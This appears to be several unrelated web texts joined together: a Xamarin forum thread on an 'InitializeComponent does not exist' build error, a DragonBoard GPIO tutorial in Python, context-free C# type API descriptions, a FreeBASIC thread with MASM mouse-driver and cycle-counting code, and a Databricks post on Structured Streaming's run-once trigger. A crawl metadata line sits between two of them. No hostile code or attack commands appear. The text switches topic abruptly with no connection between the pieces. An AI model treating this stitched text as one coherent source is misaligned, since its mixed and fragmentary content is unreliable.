This is really strange and inconsistent. Sometimes it runs fine and sometimes I get the following error
'The name 'InitializeComponent' does not exist in the current context'
There is absolutely no change in code and project settings. Just sometimes it runs and sometimes it throws this compilation error. How to resolve this?
Answers
Clean and build anyway. It's a false positive.
I have tried that many times. It will run once and then it won't run, with the error. How to resolve this?
Let's see the code for that. My guess is that there is no inheritance on the class.
for example:
public partial class HomePage : GenericPage
This is how it is inheriting
public partial class ResultPage : ContentPage
I would think that should be fine. That's about as vanilla as you can get.
Reboot the PC?
Double check the XAML of that page? If there is an issue in the XAML, that gets generated to code when you compile... If that generated code is screwed up then the partial class that is the code-behind would probably get squirrely.
tried all those options.
Don't know what to tell ya in that case. It's not systemic with Xamarin in general or everyone would be seeing the same thing.
@ClintStLaurent thanks. I hope Xamarin team gives some clear instruction.
Clear instruction... For what? You've got some bad code or markup someplace. It's a problem specific either to your installation or your solution, not to everyone. So there's little anyone can tell you based on "I get an error".
Start with a new solution. Make NO CHANGES. Build it 10 times. Does it still happen?
Make a minor change to one line. Something that can't be screwed up, like going from
int x = 10; to
int x = 20; just to force a re-compile. Build and run. Does it still fail? Do that same kind of minor change 10 times. Do any of them fail?
Maybe your files' Build Actions changed.
Please check your XAML file's build action: it should be EmbeddedResource.
And the C# file's build action should be Compile.
Right click on the files ----> Properties, then check the build action for both files.
Thank you
Xamarin Studio should give a clear error message. It is giving an error message that cannot be understood. The Xamarin team needs to work on this. There is no bad code. It is simple and straightforward code. Even if there is an error, the compiler should say what the error is, as happens in Xcode or Android Studio. But these errors are meaningless and don't give any clue where the actual problem is. Team Xamarin needs to improve a lot.
You can stop right there. Xamarin Studio is end of life. It's out of date at this point. You probably want to update to Visual Studio. Otherwise you have no way to know if any problems you encounter are because of Xamarin Studio being out of date, or if it's your code.
@ClintStLaurent Is there any official news that Xamarin Studio will be phased out? Please share with me.
Yeah - Months ago. At the Visual Studio 2017 release it was said in one of the presentations that Xamarin Studio wouldn't be receiving additional updates. A commentator interviewing some higher-up or another asked it point blank and got an equally direct answer.
We all kind of knew it would happen at one point or another. It's just good business sense. Why would a company continue to develop a second IDE when they already own Visual Studio? There is no reason to. Certainly no financial responsibility in doing so.
Yeah, update to Visual Studio, and as with any other update on this platform, get newer bugs.
One thing I learned is that one does not update anything in Xamarin unless necessary or you will get more problems.
Anyone from the Xamarin support team, please answer why I am getting this error.
Don't wait for it. You can file a bug report, but I don't think you'll get any help there either.
I suggest you create a new project and copy everything little by little until you fix the problem. This error can mean basically anything.
This is how I fixed it: clean your project, rebuild it, change your XAML file's Build Action from Embedded Resource to Compile, rebuild your project (it will throw errors), switch your XAML file's Build Action back to Embedded Resource, and rebuild.
I have the same problem.
Tried changing the build action.
In the past it worked.
Now it doesn't!
I had this problem in Visual Studio 2017 too; it seemed to be an Intellisense-related problem. An actual build worked, and in the Error List window, if I selected "Build - Intellisense" or "Intellisense Only" it displayed the errors, but if I selected "Build Only" the errors went away in the Error List window.
I fixed it by following the steps MarioLpez suggested above; thank you for that.
Finally I found my problem.
The problem was an XF versioning issue: an old dependency in a referenced PCL (netstandard) needed an old XF version,
therefore the old XF was pulled in as a package, hence the error "'InitializeComponent' does not exist".
The solution was to re-reference the new (latest) XF version in the final project, thus activating the "nearest-wins" rule as here:
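For readers unfamiliar with the "nearest-wins" rule mentioned here: when the same package is referenced at several depths of the dependency graph, the reference closest to the final project is the one that gets restored. A toy model, for illustration only (the version labels are made up, and real NuGet resolution has more rules than this):

```python
# Toy model of the "nearest wins" dependency-resolution rule: among
# several references to the same package, the one closest to the
# final project (smallest depth) is the one that is used.
def resolve_nearest_wins(references):
    """references: list of (depth_from_final_project, version)."""
    return min(references, key=lambda r: r[0])[1]
```

So a direct reference (depth 1) to the latest XF in the final project overrides the old version pulled in transitively (depth 2) by the PCL.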
That worked for me!
Thanks that worked for me, too!
@VenkataSwamy, thanks for the correct input, it has solved my issue.
Yeah, that worked for me
Thank you.
Hi.
Tried the MarioLpez approach; this did not work entirely. Next, tried prishah's steps. Still no joy. So I then tried this one. Bingo!
Everything builds and I can run the project in the Simulator (unrelated, but just in case, I was using jamesmontemagno's IsRefreshing app from github).
This problem happened to me when I bound "IsEnabled" twice by mistake for a "switch", like this:
Change the ContentPage properties to:
I was attempting to see what upgrading to the newest forms would do to my project...as always it was a disaster so I opted to restore from TFS and this problem happened. It's clearly not a code issue as I'm restoring every bit of code to a known working condition. MarioLpez's approach resolved my issue. I still have no idea what the real problem was, which is par for the course with Xamarin.
I just came to this and the problem was that after renaming the .cs file, I forgot to change the Class in the .xaml file.
Hi, I managed to fix the same issue by these steps:
the problem is that x:Class=Solution.Name has to match the class name.
Thanks @carloslzp, I had changed the page name but the x:Class was still Page1
This is always because of your XAML. Usually the namespace declaration in the XAML.
I have this. I know it is something to do with the .cs and .xaml files having something wrong between them, as I have fixed it in the past.
As it is one of those errors with a number of different causes, could the team do something to break it down a bit? Which keyword or token doesn't it like?
I'm pretty sure the same process that I outline here still works:
@shaunpryszlak said:
Unless you are doing something really weird to make your UI this shouldn't be the case. The XAML and xaml.cs files are made together and match. So if they're out of sync it's something you did specifically, like a rename of one but not the other. Sometimes global find & replace can bite you.
If that's not the case... If you didn't do something to throw them out of sync and screw up their naming try the standard clean/close/open/build process above.
Today I have also got this. No clean-up worked for me (deleting bin/obj, etc.).
The issue was with my XAML, where x:Class was pointing to the wrong namespace. Failing this, it throws the above-mentioned error (InitializeComponent does not exist). This usually happens if you're doing copy-paste of XAML markup between solutions, and it doesn't throw the right exception. Hope it helps someone.
DragonBoard: How to Access GPIOs Using Python
Introduction: DragonBoard: How to Access GPIOs Using Python
The DragonBoard™ 410c is the first development board based on a Qualcomm® Snapdragon™ 400 series processor. It features advanced processing power, Wi-Fi, Bluetooth connectivity, and GPS, all packed into a board the size of a credit card. It is based on the 64-bit capable Snapdragon 410E.
In this tutorial you will learn how to access the GPIOs of the board from Python, using the Linux GPIO interface.
List of Material:
1 - Dragonboard410c
1 - 96Boards sensors board
1 - Grove Button
1 - Grove LED
Step 1: Installing the Python
First, update the package index.
$ sudo apt-get update
Now, you can install the Python 2.7 with the following command:
$ sudo apt-get install python2.7
Step 2: Download Source Code
Download the source code below:
Step 3: Dragonboard GPIO Pin Mappings
This picture shows the DragonBoard GPIO pin mappings. In the source code, to access a GPIO pin, call the function for that specific pin.
For example:
def getPin23(self):
    return self.getPin(36)
This method will give access to the GPIO pin 23.
Step 4: Set GPIO Direction
In the file GPIOLibrary.py there are functions to set the GPIO direction.
Set GPIO pin as output:
def out(self):
    self.setDirection("out")
Set GPIO pin as input:
def input(self):
    self.setDirection("in")
To get the GPIO direction, call the getDirection() function.
Step 5: Read and Write Values on GPIO
In GPIOLibrary.py there are functions to read and write values on a GPIO pin.
Set GPIO pin as High level:
def high(self):
    self.setValue(1)
Set GPIO as Low level:
def low(self):
    self.setValue(0)
To read the value from a GPIO, call the getValue() function.
Step 6: Release Access to the GPIO
After using a GPIO pin, it is necessary to release access to it.
Call the cleanup() function in GPIOLibrary.py to remove access to the pins.
def cleanup(self):
    for pin in self.GPIOList:
        pin.input()
        pin.closePin()
    self.GPIOList = []
The "closePin()" function will disable access to the GPIO and remove the corresponding directory.
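Internally, libraries like this drive the Linux GPIO sysfs interface: writing a pin number to /sys/class/gpio/export makes the kernel create a gpioN directory, and direction and value are ordinary files inside it. Below is a minimal sketch of such a wrapper. This is hypothetical code, not the tutorial's actual GPIOLibrary.py; the root parameter is an assumption added only so the class can be exercised against a scratch directory instead of real hardware:

```python
import os

class SysfsPin:
    """Minimal Linux sysfs GPIO wrapper (a sketch, not GPIOLibrary.py)."""
    GPIO_ROOT = "/sys/class/gpio"

    def __init__(self, number, root=None):
        self.number = number
        self.root = root or self.GPIO_ROOT
        self.path = os.path.join(self.root, "gpio%d" % number)

    def _write(self, filename, value):
        with open(filename, "w") as f:
            f.write(str(value))

    def export(self):
        # Ask the kernel to expose the pin as a gpioN directory.
        self._write(os.path.join(self.root, "export"), self.number)

    def set_direction(self, direction):
        # direction is "in" or "out", as in Step 4 of the tutorial.
        self._write(os.path.join(self.path, "direction"), direction)

    def set_value(self, value):
        # 1 for high, 0 for low.
        self._write(os.path.join(self.path, "value"), value)

    def get_value(self):
        with open(os.path.join(self.path, "value")) as f:
            return int(f.read().strip())

    def close(self):
        # Release the pin: the kernel removes the gpioN directory.
        self._write(os.path.join(self.root, "unexport"), self.number)
```

A real run needs root privileges, and on the DragonBoard the header pins map to internal Linux GPIO numbers first (for example pin 23 to 36, as shown in Step 3).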
Step 7: Blink Led After Pressing Button
The blink_led.py script runs an example that blinks the LED when the button is pressed, for 20 seconds.
In this example we access pin 27 for the blink LED and pin 29 to read the button status.
After 20 seconds, both GPIOs are released.
To run, type the command:
$ sudo python blink_led.py
Step 8: References
A type.
Gets an immediate base interface of this class, if any.
Gets an immediate base type of this type, if any.
Gets a member of this type, if any.
Gets an immediate subtype of this type, if any.
Gets the immediate base class of this class, if any.
Gets an index for implicit conversions. A type can be converted to another numeric type of a higher index.
Gets the containing type of this type, if any.
Gets the location of this element.
Gets the name of this element.
Gets the namespace directly containing this type, if any.
Gets the parent of this type container, if any.
Gets the unbound generic type of this type, or this if the type is already unbound.
Gets the machine type used to store this type.
Holds if this element has the qualified name qualifier.name.
Holds if this type is a class.
Holds if this type is an enum.
Holds if this type is an interface.
Holds if this type is private.
Holds if this type is public.
Holds if this type is a member of the System namespace and has the name name. This is the same as getQualifiedName() = "System.<name>", but is faster to compute.
Gets a textual representation of this element.
Gets an attribute (for example [Obsolete]) of this declaration, if any.
Gets the C# declaration corresponding to this CIL declaration, if any. Note that this is only for source/unconstructed declarations.
Gets the file containing this element.
Gets a unique string label for this element.
Gets the “language” of this program element, as defined by the extension of the filename. For example, C# has language “cs”, and Visual Basic has language “vb”.
Gets the fully qualified name of this element, for example the fully qualified name of M on line 3 is N.C.M in
Gets the unbound version of this declaration.
Gets the name of this type without additional syntax such as [], *, or <...>.
Holds if this element has name ‘name’.
Holds if this element has qualified name qualifiedName, for example System.Console.WriteLine.
Holds if this declaration is a source declaration.
Gets the full textual representation of this element, including type information.
What is the fastest way to use the mouse in direct vesa mode. (No freebasic fbgfx graphic commands)
Do using interrupts, going from protected mode to real mode and back, slow things down?
Direct vesa:Fastest way to use the mouse?
DOS specific questions.
Re: Direct vesa:Fastest way to use the mouse?
For real-mode DOS and QuickBASIC one method that worked well for me was to set up a mouse driver interrupt sub that stored the mouse status in a QuickBASIC global structure, eliminating the need to periodically call the mouse driver. Once installed, the mouse driver called the interrupt sub for any of the defined conditions (events), the interrupt sub updated the QuickBASIC global structure, and the QuickBASIC app could simply read the mouse status from the structure members. Here are the relevant parts of the assembly module source:
Code: Select all
;===================================================
; This is the MASM 6+ source code for a QuickBASIC
; Mouse procedure library. Beyond providing wrappers
; for a few of the most common mouse functions, it
; includes a MouseInit procedure that initializes
; the mouse driver and installs a mouse driver
; interrupt subroutine that maintains the current
; mouse status in a QuickBASIC global variable.
;
; The QuickBASIC global variable must be of type
; MouseType, and the segment and offset addresses
; of the variable must be passed in the first call
; to the MouseInit procedure. The button states
; are TRUE (-1) if the button is pressed, or FALSE
; (0) if the button is not pressed. The event mask
; indicates what type of mouse event triggered the
; most recent interrupt. The possible events are a
; position change or a press or release of the
; left or right button.
;
; TYPE MouseType
; x AS INTEGER ' Cursor X coordinate
; y AS INTEGER ' Cursor Y coordinate
; left AS INTEGER ' Left button state
; right AS INTEGER ' Right button state
; event AS INTEGER ' Event mask
; END TYPE
; DIM SHARED mouse AS MouseType
;
; These constants are used to interpret the event
; mask. The assigned values are the value of the
; corresponding bit in the event mask, so an
; event can be detected by ANDing the appropriate
; constant with the event mask.
; CONST POSITION = 1
; CONST LPRESS = 2
; CONST LRELEASE = 4
; CONST RPRESS = 8
; CONST RRELEASE = 16
;
; For the range of video modes that are supported
; by QuickBASIC, the interrupt subroutine and the
; MouseSetPosition procedure automatically
; translate between mouse driver virtual screen
; coordinates and physical screen coordinates,
; so as viewed from the QuickBASIC module all
; coordinates are physical screen coordinates.
; For the text modes, the x coordinate will be
; the base 1 column position and the y coordinate
; will be the base 1 row position.
;
; For uniformity, all of the procedures that take
; arguments expect the arguments to be passed by
; reference. "Pass by reference" is the QB default
; and it means that the value passed is the address
; of the argument in the QB default data segment.
; Within the procedures, the arguments, which as
; viewed from the procedure are properly termed
; "parameters", are accessed by first loading the
; address of the parameter into a base or index
; register and then by using a register indirect
; form of the instruction that accesses the
; parameter. For example, to load the value of a
; parameter named varPtr into AX:
;
; mov bx,varPtr
; mov ax,[bx]
;
; QB procedures are always called with a far call
; and the procedures must preserve the direction
; flag and the BP, DI, SI, DS, and SS registers.
; The BASIC calling conventions require that the
; arguments be pushed onto the stack in left to
; right order as they appear in the procedure
; definition, and that the called procedure remove
; the arguments from the stack. One significant
; advantage of using MASM for mixed language
; programming is that you can specify a language
; type in the .MODEL directive and MASM will
; automatically generate the code that is required
; to properly implement the calling conventions.
; For example, for the RET instruction in the
; procedures MASM knows to encode a far return,
; and for the procedures that take arguments, MASM
; knows to add an operand to the RET instruction
; that will cause the processor to add an
; appropriate value to SP after the procedure has
; returned to the caller.
;===================================================
; Declare a structure to use as a template when
; accessing the mouse status variable.
MouseType struct
x WORD ?
y WORD ?
left WORD ?
right WORD ?
event WORD ?
MouseType ends
; This prototype establishes the call interface for
; the B_OnExit procedure (so MASM will know how to
; call it) and effectively generates an external
; declaration in this module (so MASM will know that
; the procedure is defined in another module).
B_OnExit proto far basic :far ptr
; This is the normal model specification for QB.
.model medium,basic
; Enable assembly of the 186 instruction set (the
; minimum processor that will support an immediate
; (constant) operand for a push instruction).
.186
; Start a near data segment. The linker will combine
; this segment with the QB default data segment.
.data
; Allocate a flag variable to lock out multiple
; calls to MouseInit. The name avoids the MASM
; reserved word "finit".
f_init dw 0
; Define screen and cursor masks for a crosshair
; cursor. The cursor defintion is within this
; module rather than being passed as a parameter
; simply because defining the cursor with binary
; numbers is much easier than defining it with
; hex numbers.
;
; Note that this cursor will not work correctly
; for SCREEN 1, and that the aspect ratio will
; be significantly off for the 640x200 modes.
;
; For the QB graphics modes other than SCREEN 1,
; the mouse driver will AND the screen mask bits
; with the corresponding screen pixel bits and
; XOR the result with the cursor mask. In truth
; table form:
;
; screen mask cursor mask resulting screen bit
; 0 0 0
; 0 1 1
; 1 0 unchanged
; 1 1 inverted
;
; Note that the masks bits are expanded as
; necessary for the current graphics mode.
; For example, for mode 13h (SCREEN 13) each
; mask bit is expanded to 8 bits and these
; bits are then combined with the 8 attribute
; bits for the corresponding screen pixel.
;0123456701234567
cross dw 1111111111111111b ;0
dw 1111111111111111b ;1
dw 1111111011111111b ;2
dw 1111111011111111b ;3
dw 1111111011111111b ;4
dw 1111111011111111b ;5
dw 1111111111111111b ;6
dw 0000001110000001b ;7
dw 1111111111111111b ;0
dw 1111111011111111b ;1
dw 1111111011111111b ;2
dw 1111111011111111b ;3
dw 1111111011111111b ;4
dw 1111111111111111b ;5
dw 1111111111111111b ;6
dw 1111111111111111b ;7
dw 0000000000000000b ;0
dw 0000000000000000b ;1
dw 0000000100000000b ;2
dw 0000000100000000b ;3
dw 0000000100000000b ;4
dw 0000000100000000b ;5
dw 0000000000000000b ;6
dw 1111110001111110b ;7
dw 0000000000000000b ;0
dw 0000000100000000b ;1
dw 0000000100000000b ;2
dw 0000000100000000b ;3
dw 0000000100000000b ;4
dw 0000000000000000b ;5
dw 0000000000000000b ;6
dw 0000000000000000b ;7
; Start a (far) code segment.
.code
; This include directive includes TEST.ASM in this
; file, effectively making it part of this file.
include test.asm
;===================================================
; Allocate a variable to store the far address of
; the mouse status variable, and a lookup table of
; shift and base adjust values indexed by BIOS video
; mode, that will be used to translate between mouse
; driver virtual screen coordinates and physical
; screen coordinates. These variables need to be in
; the code segment because they must be accessed
; from the interrupt subroutine, and when the mouse
; driver calls the subroutine the only segment
; register with a known value is CS.
statusVarPtr dd 0
; To allow the table to be indexed by the BIOS video
; mode the table must include all mode numbers from
; 0 to 13h, even though several of the included
; modes have no corresponding QB SCREEN mode and
; others are not supported on the typical PC. Each
; element consists of an x shift word, a y shift
; word, a base adjust word, and a pad word that is
; included to simplify table indexing. The base
; adjust value is 1 for the text modes and 0 for
; the graphic modes. Aligning the table on a word
; boundary minimizes the time required to access
; the table.
align 2
luTable dw 4,3,1,0 ; 0
dw 4,3,1,0 ; 1 (SCREEN 0, 40 column)
dw 3,3,1,0 ; 2
dw 3,3,1,0 ; 3 (SCREEN 0, 80 column)
dw 1,0,0,0 ; 4 (SCREEN 1)
dw 1,0,0,0 ; 5
dw 0,0,0,0 ; 6 (SCREEN 2)
dw 3,3,1,0 ; 7 (SCREEN 0, monochrome only)
dw 2,0,0,0 ; 8 PCjr only
dw 0,0,0,0 ; 9 PCjr only
dw 0,0,0,0 ; A PCjr only
dw 0,0,0,0 ; B EGA BIOS internal only
dw 0,0,0,0 ; C EGA BIOS internal only
dw 1,0,0,0 ; D (SCREEN 7)
dw 0,0,0,0 ; E (SCREEN 8)
dw 0,0,0,0 ; F (SCREEN 10)
dw 0,0,0,0 ; 10 (SCREEN 9)
dw 0,0,0,0 ; 11 (SCREEN 11)
dw 0,0,0,0 ; 12 (SCREEN 12)
dw 1,0,0,0 ; 13 (SCREEN 13)
;===================================================
; The following procedure declarations use the
; distance (far) and langtype (basic) from the
; .MODEL directive, and default to PUBLIC
; visibility.
;===================================================
; This proc calls the mouse driver Mouse Reset and
; Status function to reset the mouse driver to clear
; the interrupt subroutine call mask, which causes
; the mouse driver to cease calling the interrupt
; subroutine.
; This declaration must be placed before the
; reference to it in the MouseInit procedure.
;===================================================
TermProc proc
xor ax,ax
int 33h
ret
TermProc endp
;===================================================
; This proc checks for a mouse driver, resets it,
; saves the segment and offset addresses of the
; global status variable, installs the interrupt
; subroutine, and calls the B_OnExit routine to log
; a termination procedure that will automatically
; disable the interrupt subroutine when the program
; terminates. It returns non-zero for success, or
; zero for failure. The first call sets a flag that
; locks out subsequent calls.
;===================================================
MouseInit proc varSeg:WORD,varPtr:WORD
; Lock out subseqent calls.
.IF f_init != 0
xor ax,ax
ret
.ENDIF
mov f_init,-1
; Check for a mouse driver.
; Use the DOS Get Interrupt Vector function
; to get the interrupt 33h vector. If the
; segment address is zero, then the mouse
; driver is not installed.
mov ax,3533h
int 21h
mov ax,es
.IF ax == 0
ret
.ENDIF
; Attempt to reset the mouse driver. If the
; reset fails then the mouse driver is not
; installed.
xor ax,ax
int 33h
.IF ax == 0
ret
.ENDIF
; Save the address of the mouse status variable.
mov bx,varPtr
mov ax,[bx]
mov word ptr cs:statusVarPtr,ax
mov bx,varSeg
mov ax,[bx]
mov word ptr cs:statusVarPtr+2,ax
; Install the interrupt subroutine.
mov ax,12
; This condition mask specifies that an
; interrupt be generated for any of the
; defined conditions.
mov cx,11111b
push cs
pop es
mov dx,OFFSET InterruptSub
int 33h
; Register the termination routine.
; The arguments must be pushed onto the stack
; as per the basic calling convention before
; calling the routine.
push cs
push OFFSET TermProc
call B_OnExit
; Return whatever B_OnExit returned.
ret
MouseInit endp
;===================================================
; This proc is the interrupt subroutine. The mouse
; driver will call it for each mouse interrupt.
;
; The local variables allow temporary values to be
; stored on the stack in named locations.
;===================================================
align 2
InterruptSub proc
LOCAL xShift:WORD,yShift:WORD,baseAdjust:WORD
; Preserve DS before changing it because the
; mouse driver probably will not expect it to
; change.
push ds
; Preserve BX before changing it because it
; contains the button status.
push bx
; Get the video mode from the BIOS data area.
mov bx,40h
mov ds,bx
mov bx,49h
mov bx,[bx]
; Because the mode is actually stored as a
; byte and we are reading a word, and because
; bit 7 of the byte may or may not be set
; depending on whether or not the display
; memory was erased during the most recent
; mode set, we need to discard the upper 9
; bits of BX.
and bx,1111111b
; Get the corresponding x and y shift and
; base adjust values and store them in
; local variables. BX must first be scaled by
; the size of the table elements (BX=BX*8).
shl bx,3
; For instructions that take two operands,
; only one can be a memory operand. The push-
; pop sequences are used to perform a memory
; to memory move without involving a scratch
; register. Local variables can be accessed
; without a segment override because they are
; allocated from the stack, so the POP
; instructions reference BP (for example,
; "pop xShift" is encoded as "pop [bp-2]"),
; so the processor automatically uses SS.
push cs:[luTable+bx]
pop xShift
push cs:[luTable+bx+2]
pop yShift
push cs:[luTable+bx+4]
pop baseAdjust
; Load the status variable address into DS:BX.
mov bx,word ptr cs:[statusVarPtr]
mov ds,word ptr cs:[statusVarPtr+2]
; This assume informs MASM that BX contains
; a pointer to a variable of MouseType, so
; it will know what the following references
; to [bx].elementname mean:
ASSUME bx:ptr MouseType
; Store the event mask in the status variable.
mov [bx].event,ax
; We are Finished with the value in AX so pop
; the preserved button status into it.
pop ax
; Store the button status in the status
; variable. Bit0 of the button status will
; be set if the left mouse button is pressed
; and bit1 if the right mouse button is
; pressed. In the MASM 6+ High Level syntax
; "&" is the bit test operator, which returns
; true if the bit with the specified "place"
; value is set.
.IF ax & 1
mov [bx].left,-1
.ELSE
mov [bx].left,0
.ENDIF
.IF ax & 2
mov [bx].right,-1
.ELSE
mov [bx].right,0
.ENDIF
; Convert the virtual screen coordinates
; of the mouse cursor to physical screen
; coordinates and store the results in
; the status variable.
mov ax,cx
mov cx,xShift
shr ax,cl
add ax,baseAdjust
mov [bx].x,ax
mov ax,dx
mov cx,yShift
shr ax,cl
add ax,baseAdjust
mov [bx].y,ax
; Remove the assumption for BX.
ASSUME bx:NOTHING
; Recover DS.
pop ds
ret
InterruptSub endp
Snip…
The missing file test.asm is not necessary for your purposes, but by way of explaining what it was here is the start of the header:
Code: Select all
; This file contains a procedure that performs a
; measurement of the number of clock cycles the
; interrupt subroutine takes to execute. To use the
; procedure, include this file in MOUSELIB.ASM
;
; The purpose of the measurement was to ensure that,
; in the worst case, the interrupt subroutine would
; not consume an unreasonable amount of processor
; time.
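As the library header above describes, the event mask packs one condition per bit (POSITION = 1, LPRESS = 2, LRELEASE = 4, RPRESS = 8, RRELEASE = 16), so a condition is detected by ANDing its constant with the mask. For illustration, the same decoding written in Python:

```python
# Mouse-driver event mask bits, as defined in the library header.
EVENTS = {
    "position": 1,        # cursor position changed
    "left_press": 2,
    "left_release": 4,
    "right_press": 8,
    "right_release": 16,
}

def decode_events(mask):
    """Return the names of all conditions set in an event mask."""
    return [name for name, bit in EVENTS.items() if mask & bit]
```

The interrupt sub stores this mask in the shared status structure, so the application can tell at a glance which mouse event triggered the most recent interrupt.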
Re: Direct vesa:Fastest way to use the mouse?
How do you use the Allocate Real Mode Call-Back Address function to call a protected mode subroutine?
Re: Direct vesa:Fastest way to use the mouse?
Do using interrupts, going from protected mode to real mode and back, slow things down?
Yes, there is a surprising amount of overhead involved.
This is a FB-DOS version of the newer cycle count macros (counter.bas):
Code: Select all
''=============================================================================
dim shared as longint counter_cycles
dim shared as integer _counter_loopcount_, _counter_loopcounter_
#macro COUNTER_BEGIN( loop_count )
_counter_loopcount_ = loop_count
_counter_loopcounter_ = _counter_loopcount_
asm
xor eax, eax
cpuid '' serialize
rdtsc '' get reference loop start count
push edx '' preserve msd (most significant dword)
push eax '' preserve lsd
xor eax, eax
cpuid '' serialize
.balign 16
0: '' start of reference loop
sub DWORD PTR _counter_loopcounter_, 1
jnz 0b '' end of reference loop
xor eax, eax
cpuid '' serialize
rdtsc '' get reference loop end count
pop ecx '' recover lsd of start count
sub eax, ecx '' calc lsd of reference loop count
pop ecx '' recover msd of start count
sbb edx, ecx '' calc msd of reference loop count
push edx '' preserve msd of reference loop count
push eax '' preserve lsd of reference loop count
xor eax, eax
cpuid '' serialize
rdtsc '' get test loop start count
push edx '' preserve msd
push eax '' preserve lsd
end asm
_counter_loopcounter_ = _counter_loopcount_
asm
xor eax, eax
cpuid '' serialize
.balign 16
1: '' start of test loop
end asm
#endmacro
''=============================================================================
#macro COUNTER_END()
asm
sub DWORD PTR _counter_loopcounter_, 1
jnz 1b '' end of test loop
xor eax, eax
cpuid '' serialize
rdtsc
pop ecx '' recover lsd of start count
sub eax, ecx '' calc lsd of test loop count
pop ecx '' recover msd of start count
sbb edx, ecx '' calc msd of test loop count
pop ecx '' recover lsd of reference loop count
sub eax, ecx '' calc lsd of corrected loop count
pop ecx '' recover msd of reference loop count
sbb edx, ecx '' calc msd of corrected loop count
mov DWORD PTR [counter_cycles], eax
mov DWORD PTR [counter_cycles+4], edx
end asm
counter_cycles /= _counter_loopcount_
#endmacro
''=============================================================================
To get an accurate value for the overhead of a RM software interrupt called from PM we would ideally need an interrupt where the handler consisted of an IRET instruction, so it would simply return from the interrupt. While this is doable, in the interest of keeping it simple the code below calls an interrupt where the handler simply reads a word from the BIOS data area and returns it in AX. The code for the handler should look something like this:
Code: Select all
jmp handler
...
handler:
push ds
mov ds, cs:[xxxx]
mov ax, ds:[0010]
pop ds
iret
And excluding the IRET it should execute in some small number of clock cycles.
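The correction the COUNTER macros apply (time an empty reference loop, then subtract it from the timed test loop) works with any monotonic counter. Here is a Python sketch of the same arithmetic, with time.perf_counter_ns standing in for RDTSC; this is an illustration of the idea, not a cycle-accurate tool:

```python
import time

def measure(fn, loops=100, counter=time.perf_counter_ns):
    """Average per-iteration cost of fn(), with empty-loop overhead
    subtracted (the COUNTER_BEGIN/COUNTER_END reference-loop idea)."""
    start = counter()
    for _ in range(loops):
        pass                      # reference loop: loop overhead only
    ref = counter() - start

    start = counter()
    for _ in range(loops):
        fn()                      # test loop: overhead plus payload
    test = counter() - start

    return (test - ref) / loops   # corrected per-iteration cost
```

The assembly version additionally serializes with CPUID around each RDTSC so out-of-order execution cannot smear instructions across the measurement boundaries, something a high-level sketch like this cannot reproduce.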
Code: Select all
#include "counter.bas"
sleep 5000
''-----------------------------------------------------------
'' Disable the maskable interrupts so the system timer tick,
'' keyboard interrupt, etc will not interfere with the cycle
'' count code.
''-----------------------------------------------------------
asm cli
for i as integer = 1 to 6
COUNTER_BEGIN( 100 )
COUNTER_END()
print counter_cycles
COUNTER_BEGIN( 100 )
asm int 0x11
COUNTER_END()
print counter_cycles
next
asm sti
sleep
Results running on a P2 under MS-DOS 6.22 with HDPMI and CWSDPMI:
Code: Select all
HDPMI:
0
2112
0
2110
0
2109
0
2110
0
2110
0
2110
CWSDPMI:
0
4665
0
4653
0
4667
0
4673
0
4672
0
4651
The results running on the same system under Window ME were very close to the HDPMI results.
Results with the Windows XP NTVDM:
Code: Select all
-1
12768
0
12653
0
12688
0
12738
0
12645
0
12678
The method that I suggested above would eliminate the need for all but a few of the software interrupts, but as with most hardware devices there would still be hardware interrupts going on, and it is the mouse hardware interrupts that trigger the calls to the mouse driver interrupt sub. All of the mice that I have tested were generating hardware interrupts at a rate of 200 per second. IIRC the maximum rate is 400 interrupts per second. When polling the mouse driver with software interrupts, depending on the structure of your program loop, you could be generating many thousands of interrupts per second.
How do you use the Allocate Real Mode Call-Back Address function to call a protected mode subroutine?
I have not tried yet, but I expect that it will not be difficult. Which VESA modes do you expect to be using?
Re: Direct vesa:Fastest way to use the mouse?
Vesa LBF mode 101h, 640x480 8 bit color.
5 posts • Page 1 of 1
Who is online
Users browsing this forum: No registered users and 1 guest | https://www.freebasic.net/forum/viewtopic.php?f=4&t=21331&p=188745 | CC-MAIN-2019-51 | refinedweb | 3,221 | 65.05 |
This is the sixth post in a multi-part series about how you can perform complex streaming analytics using Apache Spark.
Traditionally, when people think about streaming, terms such as “real-time,” “24/7,” or “always on” come to mind. You may have cases where data only arrives at fixed intervals. That is, data appears every hour or once a day. For these use cases, it is still beneficial to perform incremental.
Triggers are specified when you start your streams.
# Load your Streaming DataFrame sdf = spark.readStream.load(path="/in/path", format="json", schema=my_schema) # Perform transformations and then write… sdf.writeStream.trigger(once=True).start(path="/out/path", format="parquet")
import org.apache.spark.sql.streaming.Trigger // Load your Streaming DataFrame val sdf = spark.readStream.format("json").schema(my_schema).load("/in/path") // Perform transformations and then write… sdf.writeStream.trigger(Trigger.Once).format("parquet").start("/out/path")
Why Streaming and RunOnce is Better than Batch
You may ask, how is this different than simply running a batch job? Let’s go over the benefits of running Structured Streaming over a batch job.
Bookkeeping
When you’re running a batch job that performs incremental updates, you generally have to deal with figuring out what data is new, what you should process, and what you should not. Structured Streaming already does all this for you. In writing general streaming applications, you should only care about the business logic, and not the low-level bookkeeping.
Table Level Atomicity
The most important feature of a big data processing engine is how it can tolerate faults and failures. The ETL jobs may (in practice, often will) fail. If your job fails, then you need to ensure that the output of your job should be cleaned up, otherwise you will end up with duplicate or garbage data after the next successful run of your job.
While using Structured Streaming to write out a file-based table, Structured Streaming commits all files created by the job to a log after each successful trigger. When Spark reads back the table, it uses this log to figure out which files are valid. This ensures that garbage introduced by failures are not consumed by downstream applications.
Stateful Operations Across Runs
If your data pipeline has the possibility of generating duplicate records, but you would like exactly once semantics, how do you achieve that with a batch workload? With Structured Streaming, it’s as easy as setting a watermark and using
dropDuplicates(). By configuring the watermark long enough to encompass several runs of your streaming job, you will make sure that you don’t get duplicate data across runs.
Cost Savings
Running a 24/7 streaming job is a costly ordeal. You may have use cases where latency of hours is acceptable, or data comes in hourly or daily. To get all the benefits of Structured Streaming described above, you may think you need to keep a cluster up and running all the time. But now, with the “execute once” trigger, you don’t need to!
At Databricks, we had a two stage data pipeline, consisting of one incremental job that would make the latest data available, and one job at the end of the day that processed the whole day’s worth of data, performed de-duplication, and overwrote the output of the incremental job. The second job would use considerably larger resources than the first job (4x), and would run much longer as well (3x). We were able to get rid of the second job in many of our pipelines that amounted to a 10x total cost savings. We were also able to clean up a lot of code in our codebase with the new execute once trigger. Those are cost savings that makes both financial and engineering managers happy!
Scheduling Runs with Databricks
Databricks’ Jobs scheduler allows users to schedule production jobs with a few simple clicks. Jobs scheduler is ideal for scheduling Structured Streaming jobs that run with the execute once trigger.
